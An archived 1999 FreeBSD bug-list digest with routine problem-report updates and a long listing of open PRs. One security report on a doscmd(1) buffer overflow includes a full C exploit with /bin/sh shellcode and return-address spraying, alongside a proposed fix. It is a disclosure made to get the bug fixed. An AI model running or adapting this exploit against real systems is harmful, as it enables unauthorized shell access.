(freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 36B6F14C97; Mon, 20 Dec 1999 09:47:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA38767; Mon, 20 Dec 1999 09:47:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:47:58 -0800 (PST) From: Message-Id: <199912201747.JAA38767@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/12013: patch for 12012 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: patch for 12012 Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 09:47:10 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10: 4:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 15A2215359; Mon, 20 Dec 1999 10:04:28 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA40788; Mon, 20 Dec 1999 10:04:27 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:04:27 -0800 (PST) From: Message-Id: <199912201804.KAA40788@freefall.freebsd.org> To: gtlyang@hotmail.com, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11812: ftp5.freebsd.org can't find giflib-3.0 and ftp3.freebsd.org can't install from ftp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ftp5.freebsd.org can't find giflib-3.0 and ftp3.freebsd.org can't install from ftp State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Mon Dec 20 10:03:29 PST 1999 State-Changed-Why: Feedback timeout ... closing ... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10: 6:24 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CC19115329; Mon, 20 Dec 1999 10:06:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA41149; Mon, 20 Dec 1999 10:06:20 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:06:20 -0800 (PST) From: Message-Id: <199912201806.KAA41149@freefall.freebsd.org> To: ivan.decorte@village.uunet.be, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/11788: booting problems Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: booting problems State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Mon Dec 20 10:05:20 PST 1999 State-Changed-Why: boot-easy is fully compatible with Windows 95/98. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10:12:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EDD0F15222; Mon, 20 Dec 1999 10:12:47 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA42124; Mon, 20 Dec 1999 10:12:47 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:12:47 -0800 (PST) From: Message-Id: <199912201812.KAA42124@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phantom@FreeBSD.org Subject: Re: misc/11149: Web page entry for BAFUG is incorrect Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Web page entry for BAFUG is incorrect Responsible-Changed-From-To: freebsd-bugs->phantom Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 10:12:25 PST 1999 Responsible-Changed-Why: I'll take it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10:17:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5CC3A14A1B; Mon, 20 Dec 1999 10:17:21 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA42697; Mon, 20 Dec 1999 10:17:21 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:17:21 -0800 (PST) From: Message-Id: <199912201817.KAA42697@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/11316: [PATCH] HTTP proxy support for sysinstall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] HTTP proxy support for sysinstall Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 10:16:50 PST 1999 Responsible-Changed-Why: Over to Mr. Sysinstall BTW, looks like godd idea (IMHO) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10:20: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A2C414CFA; Mon, 20 Dec 1999 10:20:07 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA43020; Mon, 20 Dec 1999 10:20:07 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:20:07 -0800 (PST) From: Message-Id: <199912201820.KAA43020@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/9582: configApache command doesn't work for /stand/sysinstall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: configApache command doesn't work for /stand/sysinstall Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 10:19:08 PST 1999 Responsible-Changed-Why: Over to ... guess who ? :) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 10:42: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0BAA414BC3; Mon, 20 Dec 1999 10:42:08 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA45320; Mon, 20 Dec 1999 10:42:07 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 10:42:07 -0800 (PST) From: Message-Id: <199912201842.KAA45320@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phantom@FreeBSD.org Subject: Re: misc/10349: For long .Dt fields, rendering is broken-looking in mdoc Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: For long .Dt fields, rendering is broken-looking in mdoc Responsible-Changed-From-To: freebsd-bugs->phantom Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 10:39:24 PST 1999 Responsible-Changed-Why: I'll take it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 11: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B562C14BD8 for ; Mon, 20 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA46674; Mon, 20 Dec 1999 11:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mx1.lublin.pl (mx1.lublin.pl [212.182.63.76]) by hub.freebsd.org (Postfix) with ESMTP id BDCAB14BD8 for ; Mon, 20 Dec 1999 10:54:39 -0800 (PST) (envelope-from venglin@lagoon.FreeBSD.lublin.pl) Received: from lagoon.freebsd.lublin.pl ([212.182.117.180]:5904 "HELO lagoon.FreeBSD.lublin.pl") by krupik.man.lublin.pl with SMTP id ; Mon, 20 Dec 1999 19:54:22 +0100 Received: (qmail 99399 invoked by uid 1001); 20 Dec 1999 18:54:51 -0000 Message-Id: <19991220185451.99398.qmail@lagoon.FreeBSD.lublin.pl> Date: 20 Dec 1999 18:54:51 -0000 From: venglin@lagoon.FreeBSD.lublin.pl Reply-To: venglin@lagoon.FreeBSD.lublin.pl To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/15593: [SECURITY] ustrcpy() buffer overflow in doscmd(1) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15593 >Category: bin >Synopsis: [SECURITY] ustrcpy() buffer overflow in doscmd(1) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 11:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Przemyslaw Frasunek >Release: FreeBSD 3.4-STABLE i386 >Organization: Lublin BSD Users Group >Environment: FreeBSD lagoon.FreeBSD.lublin.pl 3.4-STABLE FreeBSD 3.4-STABLE #0: Sat Dec 18 17:37:37 CET 1999 root@:/usr/sys/compile/LAGOON i386 >Description: It is possible to gain extra privileges by overflowing buffer in dos_makepath(). doscmd(1) is NOT suid/sgid by default. >How-To-Repeat: /* * * (c) 1999 babcia padlina ltd. * FreeBSD /usr/bin/doscmd exploit. * */ #include #include #include #include #define NOP 0x90 #define BUFSIZE 1000 #define ADDRS 1200 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char *execshell = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; char *buf, *p; int noplen, i, ofs, align; long ret, *ap; if(!(buf = (char *)malloc(BUFSIZE+1))) { perror("malloc()"); return -1; } if (argc < 3) { fprintf(stderr, "usage: %s ofs align\n", argv[0]); exit(0); } ofs = atoi(argv[1]); align = atoi(argv[2]); noplen = BUFSIZE - strlen(execshell); ret = getesp() + ofs; memset(buf, NOP, noplen); buf[noplen+1] = '\0'; strcat(buf, execshell); setenv("EGG", buf, 1); free(buf); if(!(buf = (char *)malloc(ADDRS+align+1))) { perror("malloc()"); return -1; } memset(buf, 'a', align); p = &buf[align]; ap = (unsigned long *)p; for(i = 0; i < ADDRS / 4; i++) *ap++ = ret; p = (char *)ap; *p = '\0'; fprintf(stderr, "ret: 0x%x\n", ret); execl("/usr/bin/doscmd", "doscmd", buf, 0); return 0; } >Fix: Replace ustrcpy() and ustrcat() with strncpy() and strncat() in cwd.c:232. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 11: 1:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 95FB515386 for ; Mon, 20 Dec 1999 11:00:09 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Received: (from peter@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA46687 for freebsd-bugs@freebsd.org; Mon, 20 Dec 1999 11:00:02 -0800 (PST) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 20 Dec 1999 11:00:02 -0800 (PST) Message-Id: <199912201900.LAA46687@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: FreeBSD bugs list Subject: Current problem reports Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Current FreeBSD problem reports The following is a listing of current problems submitted by FreeBSD users. These represent problem reports covering all versions including experimental development code and obsolete releases. Bugs can be in one of several states: o - open A problem report has been submitted, no sanity checking performed. a - analyzed The report has been examined by a team member and evaluated. f - feedback The problem has been solved, and the originator has been given a patch or a fix has been committed. The PR remains in this state pending a response from the originator. s - suspended The problem is not being worked on. This is a prime candidate for somebody who is looking for a project to do. If the problem cannot be solved at all, it will be closed, rather than suspended. c - closed A problem report is closed when any changes have been integrated, documented, and tested. Critical problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- o [1996/12/20] bin/2258 wollman route add/delete [network] xxx.yyy.zzz.0 o [1997/03/08] kern/2923 panic: vm_fault: fault on nofault entry, o [1997/07/03] kern/4021 peter Local mount of a local NFS exported direc o [1997/07/31] kern/4200 peter NFS: "vm_fault: fault on nofault entry" w o [1997/10/01] kern/4673 Two panics, now crash dumps, always in re o [1997/11/24] bin/5139 portmap does not find interfaces correctl f [1997/12/21] kern/5355 Fix for NULLFS problems o [1998/02/03] kern/5641 peter running processes at the IDLE priority (i o [1998/02/10] kern/5703 CDROM Media Error triggers complete syste o [1998/03/23] bin/6121 peter gethostbyname(3) no longer returns NO_DAT s [1998/05/13] kern/6630 julian [PATCH] Fix for Cyrix I8254 bug o [1998/07/12] kern/7264 gibbs Buslogic BT 950 scsi card not detected o [1998/08/15] kern/7622 Kernel panic with Fatal trap 18. o [1998/09/08] i386/7859 luigi fatal trap 12 in midi_synth_input f [1998/09/14] kern/7927 n_hibma Fatal trap 12: page fault while in kernel o [1998/09/28] kern/8074 se CAM rescan operation fatal o [1998/10/03] gnu/8138 obrien gcc -pipe xxx.s hangs f [1998/10/06] i386/8179 Install failure with motherbord using SIS f [1998/10/08] i386/8214 n_hibma Install 3.0-19981006-BETA fails a [1998/11/08] ports/8609 nectar eklogin service (kerberos klogind) fails f [1998/11/12] i386/8673 bug in vm_page_alloc_contig() o [1998/11/24] bin/8829 bug in innetgr (was: Fix port: security/s f [1998/11/25] kern/8861 n_hibma under heavy (multi interface) traffic ep0 f [1998/12/09] kern/9036 Boot 3.0-Release hangs with BT-445S after a [1999/01/05] kern/9334 n_hibma cp fails for 2048 Bytes/sector media o [1999/01/27] kern/9742 tx driver for smc autodetects fine, but n o [1999/02/02] misc/9885 BIND 8.1.2 core dumping o [1999/02/19] kern/10166 panic during heavy sio i/o;no coproc; ves o [1999/02/20] kern/10172 panic: cannot allocate pipe - out of kvm o [1999/02/23] kern/10224 panic: pipeinit: cannot allocate pipe -- s [1999/02/26] kern/10281 Crash of 3.1-STABLE system due to scsi er o [1999/02/26] i386/10282 PCMCIA problems in 3.1-RELEASE? o [1999/03/01] kern/10332 gibbs System freezes during certain SCSI activi o [1999/03/01] bin/10344 fenner Core dump in gethostbyaddr for 199.93.70. o [1999/03/05] kern/10397 3.1R page fault while in kernel mode, fro o [1999/03/07] misc/10473 Incorrect aout compat libraries in XF8633 o [1999/03/09] kern/10507 Process hangs in state VM pgd o [1999/03/09] misc/10509 Cvs can hang system when used with pserve o [1999/03/09] kern/10520 can't exec files under nullfs o [1999/03/11] kern/10542 page fault while in kernel mode, not kern o [1999/03/11] kern/10545 When a fork/exec stress test is run, the o [1999/03/12] misc/10566 obrien patch dhcpc problem on /etc/pccard_ether o [1999/03/17] kern/10636 ipfw problems o [1999/03/19] i386/10683 I have a buslogic BT-948 FW controller. W o [1999/03/20] i386/10690 Installation freezes after device selecti f [1999/03/20] kern/10701 ppbus printing problems o [1999/03/22] ports/10725 stb Wrong Cyrus IMAP deliver group o [1999/03/23] bin/10744 call to login() from aout/libutil.so.2.2 o [1999/03/27] kern/10828 3.1-STABLE freezes when writing to floppy o [1999/03/29] kern/10866 ahc2740 panic o [1999/03/30] kern/10872 Panic in sorecieve() due to NULL mbuf poi o [1999/04/05] kern/10959 3.1-STABLE crashes due to a floppy mount o [1999/04/05] ports/10965 obrien lcc-3.6 unable to compile anything o [1999/04/13] kern/11112 Amanda on FreeBSD can wipe the _next_ tap o [1999/04/16] kern/11180 boot of fresh bsd3.1 hangs o [1999/04/17] kern/11196 n_hibma kernel mode page fault o [1999/04/19] kern/11226 Invalid files on disk after fsync o [1999/04/20] kern/11238 Synchronous PPP not functional in leased o [1999/04/20] kern/11241 Install fails after SCSI probe o [1999/04/22] i386/11278 FreeBSD Version 3.1 reboots repeatedly (c o [1999/04/23] i386/11298 Enabling IDE DMA on Opti Viper-M crashes o [1999/04/26] kern/11330 page fault in generic_bzero o [1999/04/26] conf/11343 worm; problems with installation and boot o [1999/04/26] i386/11349 Error Mounting /dev/wd0s1 on dist during o [1999/04/27] kern/11351 system reboot for error with popper and d o [1999/05/01] kern/11434 can't boot from wd0s2a o [1999/05/04] i386/11488 Error while starting FreeBSD o [1999/05/10] kern/11629 File descriptor table sharing is broken o [1999/05/12] kern/11680 server freezes, all processes stuck in "i o [1999/05/13] i386/11681 gibbs Adaptec 2940 UW SCSI Controller BIOS 1.34 o [1999/05/14] kern/11707 ncr isn't recognized in 3.1-19990512-STAB f [1999/05/17] bin/11744 perllib fails to build o [1999/05/24] kern/11869 wpaul Network hangging due to xl0: tx underrun o [1999/05/31] kern/11966 TCP copies send and receive socket buffer o [1999/06/02] kern/11988 recvmsg with a cmsghdr but no iovec is br o [1999/06/02] kern/11993 panic: getnewbuf: inconsistent EMPTY queu f [1999/06/05] kern/12041 n_hibma Crashes on startup if Zip drive is switch o [1999/06/06] conf/12050 No /sbin/init on fixit flop o [1999/06/07] kern/12072 vm_fault happened in binary file transfer o [1999/06/09] ports/12098 se KDM not config'd properly o [1999/06/09] kern/12106 error 6: panic: cannot mount root o [1999/06/10] kern/12127 persistent crash on idle SMP system o [1999/06/15] kern/12233 Fvwm2 causes FreeBSD-current to hang or r o [1999/06/16] kern/12248 CRON in malloc(): warning: pointer to wr o [1999/06/18] i386/12286 Segmentation violation when invoking JNI s [1999/06/23] kern/12367 Writing files larger than floppy capacity o [1999/06/25] misc/12390 Installation hangs during extraction o [1999/06/25] kern/12395 gibbs Buslogic SCSI cards (BT948) time out unde o [1999/06/30] kern/12466 Fast system hangs under high FS load o [1999/07/05] kern/12521 lmbench-1.1's context switching test hang o [1999/07/12] misc/12607 System crashes after boot, portmap endles o [1999/07/13] alpha/12623 alpha Certain valid numeric strings cause a SIG f [1999/07/20] misc/12720 gdbm (And possibly other libraries in /us o [1999/07/21] kern/12730 poll() causes indeterministic program han o [1999/07/21] misc/12743 Cannot boot the 3.2 floppies o [1999/08/02] misc/12923 Installation fails on HP Net Server o [1999/08/04] kern/12980 NetGear Dec 21140AF Ethernet Card unrecog o [1999/08/06] bin/12998 des still inetd junk pointer too low to make o [1999/08/10] i386/13059 imp Install aborts with panic:aha0: Invalid C o [1999/08/11] kern/13075 signal is not posted for async I/O on raw a [1999/08/20] kern/13270 dillon NFS hangs if written through self-mount o [1999/08/23] alpha/13338 alpha panic: pmap_remove_all: pv_table for 162b o [1999/08/24] kern/13352 No support for Promise Ultra/66 o [1999/08/30] misc/13474 Maximum Number of IPs Permitted in the .. o [1999/09/07] bin/13615 awk corrupts the memory arena when OFMT i o [1999/09/09] alpha/13653 alpha panic: pmap_remove_all: pv_table for 90b6 o [1999/09/12] kern/13709 panic: sched_sync: fsync failed o [1999/09/17] i386/13797 SMP/NFS panics on 3.3-RC o [1999/09/18] i386/13802 freebsd 3.3 fails to boot with irq proble o [1999/09/19] i386/13817 system reboot o [1999/09/19] kern/13825 tx0 "holds" packets for long periods, eve o [1999/09/19] i386/13844 keyboard locks up when I page through a m f [1999/09/20] i386/13849 grog dump on vinum r5 freezes system o [1999/09/22] i386/13892 Kern.flp does not boot on Compaq Presario o [1999/09/24] i386/13933 nfs server panics in tulip_rx_intr() o [1999/09/24] kern/13940 Panic with dd on block/"cooked" devices u o [1999/09/24] kern/13944 ATAPI cd-rom not boot to install, nor de o [1999/09/27] misc/13995 Full duplex mode doesn't work right with o [1999/09/28] kern/14028 ATAPI cd-rom not boot to install and can' o [1999/09/28] i386/14030 imp aha0 probe fails 3.3.0-RELEASE install wi o [1999/10/05] kern/14141 3.3-RELEASE crashing often o [1999/10/05] ports/14154 obrien xwpe is not completely compiled o [1999/10/06] kern/14162 sudden reboot problem ( maybe kernel pani o [1999/10/08] misc/14204 error 6: panic: cannot mout root(2) o [1999/10/10] i386/14256 System doesn't boot under FreeBSD 3.2 o [1999/10/14] kern/14322 mount respects permissions of underlying o [1999/10/15] kern/14347 kdump & truss won't compile because addit o [1999/10/17] i386/14373 Error while booting from floppy disk o [1999/10/24] i386/14492 FreeBSD won't install/work with an Asus S o [1999/10/25] kern/14510 kernel panic while pressing sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/01] kern/5624 dumping to tape causes scsi bus reset o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/09] bin/5693 hoek groff -mm or groff -mmm ??? o [1998/02/10] i386/5698 des LPIP causes spurious reboots o [1998/02/17] gnu/5767 man leaves partially formatted cat pages o [1998/02/19] kern/5794 Kernel Panic f [1998/02/27] bin/5867 peter pppd or FreeBSD ? o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/09] bin/5959 Cannot set up clocal gettys o [1998/03/10] kern/5969 non-root user can reboot/lock up system o [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/14] conf/6002 peter /etc/mail/sendmail.cf.addtions seems to l o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 lnc driver does not work correctly with A o [1998/03/22] i386/6099 des LPIP to slow machine causes hang o [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free o [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/08] kern/6251 peter ktrace very broken when logging over NFS o [1998/04/08] kern/6252 ide cdrom hangs system when on same bus a o [1998/04/09] kern/6253 Atapi wait for command phase too short. o [1998/04/10] kern/6267 dg panic: pmap_dispose_proc: upage already m o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/18] kern/6344 cy driver is outdated o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/04/22] bin/6383 csh - when ctrl-d is pressed, file is chm o [1998/05/03] kern/6506 system will not soft reboot f [1998/05/05] kern/6525 Coral-Draw 5 CD crashes 2.2.6-STABLE a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/08] bin/6557 /bin/sh is broken o [1998/05/10] bin/6577 /bin/sh environment variables not set in o [1998/05/11] ports/6591 se KDE starts /usr/bin/kzip instead of /usr/ o [1998/05/12] kern/6603 ncr driver hangs under high load o [1998/05/12] bin/6609 gmp.h not installed o [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp s [1998/05/19] kern/6686 [STABLE] -stable does not support large I o [1998/05/20] kern/6706 mount_msdos+mount_null+mc=panic o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current s [1998/05/27] misc/6773 [PATCH] tempnam.c security problems s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/04] kern/6854 [PATCH] probing brooktree849 capture card s [1998/06/04] kern/6858 inetd in realloc(): warning: junk pointer o [1998/06/04] misc/6861 [PATCH] netboot error o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output f [1998/06/19] i386/6996 Occasional complete lockup of 2.2.5R s [1998/06/22] bin/7019 [security] pwd.db almost always contains s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 3Com 3C509 locks up, or has >1000ms rtt u s [1998/06/24] bin/7059 sh dumps core on this script o [1998/06/24] ports/7061 ache fspclient's grab command fails (and remov o [1998/07/05] ports/7167 ache elm cannot pgp for more than one recipien s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/05] kern/7178 sos IDE Western Digital hard disk detection e s [1998/07/06] misc/7190 phk "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/21] conf/7354 source distribution selection bug when in f [1998/07/22] kern/7367 panic: malloc: wrong bucket o [1998/07/23] ports/7383 imp socks5 + ssh + redirection not working o [1998/07/26] kern/7405 in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 Machine crashes do not occur very often, o [1998/07/30] bin/7446 jdp Dlopen succeed in particular cases, but i o [1998/08/04] ports/7490 ache `setenv LANG/LC_CTYPE C` makes tcsh unusa s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr s [1998/08/10] kern/7562 Running wine can cause other applications o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/18] conf/7665 sysinstall quits silently o [1998/08/19] kern/7678 Problems with a 386-16 f [1998/08/20] i386/7698 n_hibma scotty/tkined library error o [1998/08/27] kern/7754 kernel panics if NFS server uses LKM vs. o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/09/01] kern/7797 System halted with "panic: pmap_release: o [1998/09/02] i386/7815 probe can't find wdc0 s [1998/09/03] gnu/7821 awk in free(): warning: chunk is already o [1998/09/03] conf/7823 sysinstall will not install XFree o [1998/09/09] bin/7872 [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/09] bin/7877 fenner libpcap and tcpdump need updating o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/16] kern/7950 Trap 12 while executing wine o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/22] conf/8031 [patch] /etc/rc looks for /etc/sendmail.c o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/29] bin/8085 sendmail startup could be backgrounded o [1998/09/30] gnu/8099 [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/07] bin/8195 ee dumps core on window resize o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/11] bin/8266 [patch] nfsd should allow just nfs versio o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/14] kern/8324 failure to deliver SIGIO when fildes mark o [1998/10/19] conf/8379 check_rcpt returns OK for nonexistent add o [1998/10/20] kern/8380 swap_page error: out of swap space o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/20] ports/8394 peter rdist6 won't compile--tries to use MOUNT_ o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg s 